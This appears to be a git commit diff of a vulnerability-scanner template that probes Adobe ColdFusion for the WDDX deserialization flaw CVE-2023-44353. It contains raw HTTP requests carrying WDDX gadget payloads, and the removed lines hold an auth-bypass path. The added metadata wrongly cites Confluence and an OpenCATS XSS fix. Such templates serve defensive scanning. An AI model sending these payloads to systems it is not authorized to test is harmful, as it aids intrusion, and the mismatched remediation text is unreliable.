matcher & path update
parent
bc1a965327
commit
5b9a2cd29e
|
@ -1,113 +1,82 @@
|
|||
id: CVE-2023-44353
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion Auth Bypass + Remote Code Execution
|
||||
name: Adobe ColdFusion WDDX Deserialization Gadgets
|
||||
author: salts
|
||||
severity: critical
|
||||
description: |
|
||||
Adobe Coldfusion contains a persistent auth bypass issue previously tagged as CVE-2023-29298 and CVE-2023-38205, these ended up being difficult/impossible
|
||||
to patch, because the fault was actually in the production IIS/Apache connector, where a hard coded rule was put in place. If an administrator ran the
|
||||
"lockdown" or production installer, this vulnerable path would be exposed to the internet.
|
||||
Recently, a remote deserialization / code execution flaw CVE-2023-44353 as published with public POC. This template chains the common auth bypass
|
||||
with the public POC looking for two common folders either C:\windows\ or /etc/.
|
||||
|
||||
|
||||
reference:
|
||||
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
|
||||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
|
||||
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
|
||||
remediation: |
|
||||
Update to the latest version of Confluence
|
||||
classification:
|
||||
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
|
||||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
|
||||
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-44353, CVE-2023-26347
|
||||
metadata:
|
||||
tags: cve,cve2023,adobe,coldfusion,auth-bypass,rce
|
||||
cve-id: CVE-2023-44353
|
||||
cwe-id: CWE-502
|
||||
epss-score: 0.00227
|
||||
epss-percentile: 0.60906
|
||||
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 4
|
||||
vendor: adobe
|
||||
product: coldfusion
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: cve,cve2023,adobe,coldfusion
|
||||
|
||||
variables:
|
||||
version_path: "/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true"
|
||||
version_path: "/CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true"
|
||||
windows_known_path: "C:\\Windows\\"
|
||||
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
|
||||
linux_known_path: "/etc/"
|
||||
linux_bad_path: "/thesecretcowlevelisreal/"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
#Windows checks here..
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
#Linux checks here..
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
|
||||
cookie-reuse: true
|
||||
redirects: true
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
# First stage, I got a version via the auth bypass
|
||||
- type: dsl
|
||||
name: CVE-2023-26347
|
||||
name: windows
|
||||
dsl:
|
||||
- status_code_1 == 200
|
||||
- regex('wddxPacket', body_1)
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_1)
|
||||
condition: and
|
||||
# Second stage, I check for version success while sending filenames that should always exist on
|
||||
# the platform
|
||||
- "status_code_1 == 500 && status_code_2 == 404"
|
||||
- contains(body_1, "coldfusion.runtime")
|
||||
condition: and
|
||||
|
||||
# This checks for the vulnerability on windows by sending a check for C:\\Windows\\ and C:\\Thisdefinitelydoesnotexist
|
||||
# If vulnerable, the different packets should return different results. Specifically the first should
|
||||
# Return a 500, 404, or canned error message, where the second should return the expected version.
|
||||
- type: dsl
|
||||
name: CVE-2023-44353
|
||||
dsl:
|
||||
|
||||
- status_code_1 == 200
|
||||
- regex('wddxPacket', body_1)
|
||||
- regex('wddxPacket', body_3)
|
||||
# I get the version number back from body 1 and body 3, but not body 2
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_1)
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_3)
|
||||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_2)"
|
||||
condition: and
|
||||
|
||||
# This checks for the vulnerability on Linux by sending a check for /etc and /thesecretcowlevelisreal/
|
||||
# If vulnerable, the different packets should return different results. Specifically the first should
|
||||
# Return a 500, 404, or canned error message, where the second should return the expected version.
|
||||
- type: dsl
|
||||
name: CVE-2023-44353
|
||||
dsl:
|
||||
|
||||
- status_code_1 == 200
|
||||
- regex('wddxPacket', body_1)
|
||||
- regex('wddxPacket', body_5)
|
||||
# I get the version number back from body 1 and body 3, but not body 2
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_1)
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_5)
|
||||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_4)"
|
||||
condition: and
|
||||
name: linux
|
||||
dsl:
|
||||
- "status_code_3 == 500 && status_code_4 == 404"
|
||||
- contains(body_3, "coldfusion.runtime")
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue